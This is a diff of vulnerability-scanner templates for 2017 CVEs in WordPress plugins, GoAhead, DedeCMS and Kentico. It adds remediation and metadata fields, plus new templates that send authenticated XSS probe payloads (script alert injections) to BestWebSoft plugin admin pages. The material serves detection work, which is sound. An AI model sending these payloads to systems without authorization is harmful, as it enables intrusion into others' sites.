b/http/cves/2017/CVE-2017-17451.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. + remediation: | + Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability. reference: - https://wordpress.org/plugins/wp-mailster/#developers - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html @@ -15,9 +17,15 @@ info: cvss-score: 6.1 cve-id: CVE-2017-17451 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm + epss-score: 0.00178 + epss-percentile: 0.5486 + cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: wpmailster + product: wp_mailster + framework: wordpress + tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm http: - method: GET @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402202022eb225eff565e4a69e924a5712fd9161871a96d3a2a756cecc4ddcf160d0a02205c82aa188ed977877ce4118c9bb55b17c34701b5c12152d73940ca22f9c603f6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index b09cf30970..9583d4534f 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -6,6 +6,8 @@ info: severity: high description: | description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. + remediation: | + Upgrade to Embedthis GoAhead version 3.6.5 or later to mitigate this vulnerability. reference: - https://www.elttam.com/blog/goahead/ - https://github.com/ivanitlearning/CVE-2017-17562 @@ -17,9 +19,14 @@ info: cvss-score: 8.1 cve-id: CVE-2017-17562 cwe-id: CWE-20 - tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub + epss-score: 0.97454 + epss-percentile: 0.99944 + cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:* metadata: max-request: 65 + vendor: embedthis + product: goahead + tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub http: - raw: @@ -95,11 +102,10 @@ http: - webviewLogin_m64 - webviewer - welcome - stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - "environment variable" @@ -109,4 +115,5 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/06/19 + +# digest: 4a0a004730450220469eee3602ebb05746e0f4ab1d88ca20bd527bf6202c584fea73c922b74954b9022100ca128c363dec0f38130bf04f92f9746339c076f11aa84556439b5eb8febf1fa1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 6e00b94647..ab2c9ef0f9 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php. + remediation: | + Apply the latest security patch or upgrade to a newer version of DedeCMS to mitigate the SQL Injection vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17731 - https://nvd.nist.gov/vuln/detail/CVE-2017-17731 @@ -14,13 +16,18 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2017-17731 cwe-id: CWE-89 + epss-score: 0.14043 + epss-percentile: 0.95066 + cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: - fofa-query: app="DedeCMS" max-request: 1 + vendor: dedecms + product: dedecms shodan-query: http.html:"DedeCms" + fofa-query: app="DedeCMS" tags: sqli,dedecms - variables: num: "999999999" @@ -39,3 +46,5 @@ http: - type: status status: - 200 + +# digest: 4a0a004730450221009f90897774dc84345e4d4c11ee1cccd20a586c66aee5e70f67b43655bffed54802203431068231b29e510b85e0a922304f3ce7b1bb22c2b8486d19be146e8d9ecb7a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index ba7052be23..59d17fb41a 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard. + remediation: | + Upgrade to the latest version of Kentico CMS to fix the privilege escalation vulnerability. reference: - https://www.exploit-db.com/ghdb/5694 - https://nvd.nist.gov/vuln/detail/CVE-2017-17736 @@ -15,10 +17,15 @@ info: cvss-score: 9.8 cve-id: CVE-2017-17736 cwe-id: CWE-425 + epss-score: 0.1483 + epss-percentile: 0.95177 + cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: - max-request: 1 - google-query: intitle:"kentico database setup" verified: true + max-request: 1 + vendor: kentico + product: kentico_cms + google-query: intitle:"kentico database setup" tags: cve,cve2017,kentico,cms,install,unauth,edb http: @@ -41,4 +48,4 @@ http: - "SQLServer" condition: and -# Enhanced by cs on 2022/10/24 +# digest: 4a0a00473045022014c89a56f441ce35df018658a0f056c55e348947e8a488c7e449560dc5a18611022100ed98f6918d0b61d24b68ac8560311008140964a370bab4530e6e5acba081e401:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index c4017b8bf3..0445a165a7 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. + remediation: | + Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://hackerone.com/reports/963798 - http://packetstormsecurity.com/files/145776/AvantFAX-3.3.3-Cross-Site-Scripting.html @@ -14,9 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2017-18024 cwe-id: CWE-79 - tags: avantfax,hackerone,packetstorm,cve,cve2017,xss + epss-score: 0.00072 + epss-percentile: 0.30058 + cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: avantfax + product: avantfax + tags: avantfax,hackerone,packetstorm,cve,cve2017,xss http: - raw: @@ -30,19 +37,19 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - 'AvantFAX' - part: body condition: and - - type: status - status: - - 200 - - type: word part: header words: - "text/html" -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100ada58478340c1611b34ef57dc31590b8da9057b609604e9c3031767fbca379fe02203f9e4b1006ad4eb29ed444eb21d004caaf22d83ae262bc6ca0cd08c602a0a3db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml new file mode 100644 index 0000000000..7b7bf69c66 --- /dev/null +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18487 + +info: + name: AdPush < 1.44 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The adsense-plugin (aka Google AdSense) plugin before 1.44 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18487 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18487 + - https://wordpress.org/plugins/adsense-plugin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18487 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: google_adsense_project + product: google_adsense + framework: wordpress + publicwww-query: "/wp-content/plugins/adsense-plugin/" + tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google AdSense")' + condition: and + +# digest: 4b0a00483046022100d04a309ea856ccbd75ad0a269c6fea7fb0470b7ac771f922d70cf43c5ed28f510221008a9cc51f21971147e642a2ffbd9f94143c40d99c872c9b1495ec3218c0744cbf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml new file mode 100644 index 0000000000..c39e459e94 --- /dev/null +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18490 + +info: + name: Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The contact-form-multi plugin before 1.2.1 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18490 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18490 + - https://wordpress.org/plugins/contact-form-multi/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18490 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: contact_form_multi + framework: wordpress + publicwww-query: "/wp-content/plugins/contact-form-multi/" + tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Contact Form Multi by")' + condition: and + +# digest: 4a0a0047304502206dbc2331b56a6eb78b1163b201a5d433cd41f1dcbd2633b880e4b16af250e372022100f1009ade6a2ef1dbfeeb514afb5e910284d23b3f76328e9a5d2fe7e0e3a018f8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml new file mode 100644 index 0000000000..0bff53de5d --- /dev/null +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18491 + +info: + name: Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The contact-form-plugin plugin before 4.0.6 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18491 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18491 + - https://wordpress.org/plugins/contact-form-plugin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18491 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: contact_form + framework: wordpress + publicwww-query: "/wp-content/plugins/contact-form-plugin/" + tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Contact Form by")' + condition: and + +# digest: 4a0a0047304502210099d491019f97f369c2a35840e078cb00716e190cf0f339f58bf3e72a550e3054022039b601333580eb6aa19f23297971a84ec6563a7da22b2af4f95440057c7b0153:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml new file mode 100644 index 0000000000..f54dc7844f --- /dev/null +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18492 + +info: + name: Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18492 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18492 + - https://wordpress.org/plugins/contact-form-to-db/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18492 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: contact_form_to_db + framework: wordpress + publicwww-query: "/wp-content/plugins/contact-form-to-db/" + tags: cve,cve2017,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Contact Form to DB by")' + condition: and + +# digest: 490a0046304402207d719bbcc59a42607c6b69240271e82562630f93654be5e3ade8d79f6dc633fd02200d2c19ac3d51ad930828a796118402f9e23abb8a218f75951e16b4a3903f3221:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml new file mode 100644 index 0000000000..a7050f1902 --- /dev/null +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18493 + +info: + name: Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18493 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18493 + - https://wordpress.org/plugins/custom-admin-page/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18493 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: custom_admin_page + framework: wordpress + publicwww-query: "/wp-content/plugins/custom-admin-page/" + tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Custom Admin Page by")' + condition: and + +# digest: 4a0a00473045022100b7663651a7b05c31925c9cd3695f09dd61f4d6f9e0b28deecc8a2743654a078f02203613b672dbeefc4f9237311f540513c0c9b83447e74034f30cd6a0086405310a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml new file mode 100644 index 0000000000..60603fbbae --- /dev/null +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18494 + +info: + name: Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The custom-search-plugin plugin before 1.36 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18494 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18494 + - https://wordpress.org/plugins/custom-search-plugin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18494 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: custom_search + framework: wordpress + publicwww-query: "/wp-content/plugins/custom-search-plugin/" + tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Custom Search by")' + condition: and + +# digest: 4b0a004830460221008e7dcfb2d22b21f1b6ec7bfe100a7101eea1156b7186fb3b163d66392ad1b699022100af5938bc05e13ff903537305096f05b724df782e03808e0701a597727a2adc5d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml new file mode 100644 index 0000000000..cb4b066dbe --- /dev/null +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18496 + +info: + name: Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18496 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18496 + - https://wordpress.org/plugins/htaccess/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18496 + cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36938 + cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: htaccess + framework: wordpress + publicwww-query: "/wp-content/plugins/htaccess/" + tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Htaccess by")' + condition: and + +# digest: 490a0046304402207e86ea49d7ae56939eb6ece6e0197890ddee733fd25d283f160708a1ad910a7c022000aa962622cdaae1a19ef31fff8d701d2edaa17e3182ce0d804eab4c59285b39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml new file mode 100644 index 0000000000..6290f2dc75 --- /dev/null +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18500 + +info: + name: Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The social-buttons-pack plugin before 1.1.1 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18500 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18500 + - https://wordpress.org/plugins/social-buttons-pack/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18500 + cwe-id: CWE-79 + epss-score: 0.00231 + epss-percentile: 0.61097 + cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: social_buttons_pack + framework: wordpress + publicwww-query: "/wp-content/plugins/social-buttons-pack/" + tags: cve,cve2017,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Social Buttons Pack by")' + condition: and + +# digest: 4a0a00473045022100fc3d75bb7a5b133b8dfca30adf5efa4c6a7a34af80b5cd977776515efdf1700902202e9f2452b784fc2f1ad4f03584bc86c8ac7676d5625e8b13672233f3440e9aab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml new file mode 100644 index 0000000000..3daa019e46 --- /dev/null +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18501 + +info: + name: Social Login by BestWebSoft < 0.2 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The social-login-bws plugin before 0.2 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18501 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18501 + - https://wordpress.org/plugins/social-login-bws/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18501 + cwe-id: CWE-79 + epss-score: 0.00231 + epss-percentile: 0.61097 + cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: social_login + framework: wordpress + publicwwww-query: "/wp-content/plugins/social-login-bws/" + tags: cve,cve2017,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Social Login by")' + condition: and + +# digest: 4a0a00473045022100d950f2ffe22514dcac56d98e1d2b4781abdd7124c62c6248bb4573f3dcbae43e02206466f291183b88851306bca74b296f0b9231ee3948c7425ca106f3292f1c63c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml new file mode 100644 index 0000000000..49b6634b9d --- /dev/null +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18502 + +info: + name: Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The subscriber plugin before 1.3.5 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18502 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18502 + - https://wordpress.org/plugins/subscriber/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18502 + cwe-id: CWE-79 + epss-score: 0.00231 + epss-percentile: 0.61097 + cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: subscriber + framework: wordpress + publicwww-query: "/wp-content/plugins/subscriber/" + tags: cve,cve2017,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Subscriber by")' + condition: and + +# digest: 4b0a00483046022100833420aaa259d481707412e4ffa5e01c4493a29d755cfc97a37a810a8eb045d2022100a67adf7163effea6d1d596857d2597fa619b1cdb21ddc05b31a3f148c51c75d3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml new file mode 100644 index 0000000000..48534600ac --- /dev/null +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -0,0 +1,56 @@ +id: CVE-2017-18505 + +info: + name: 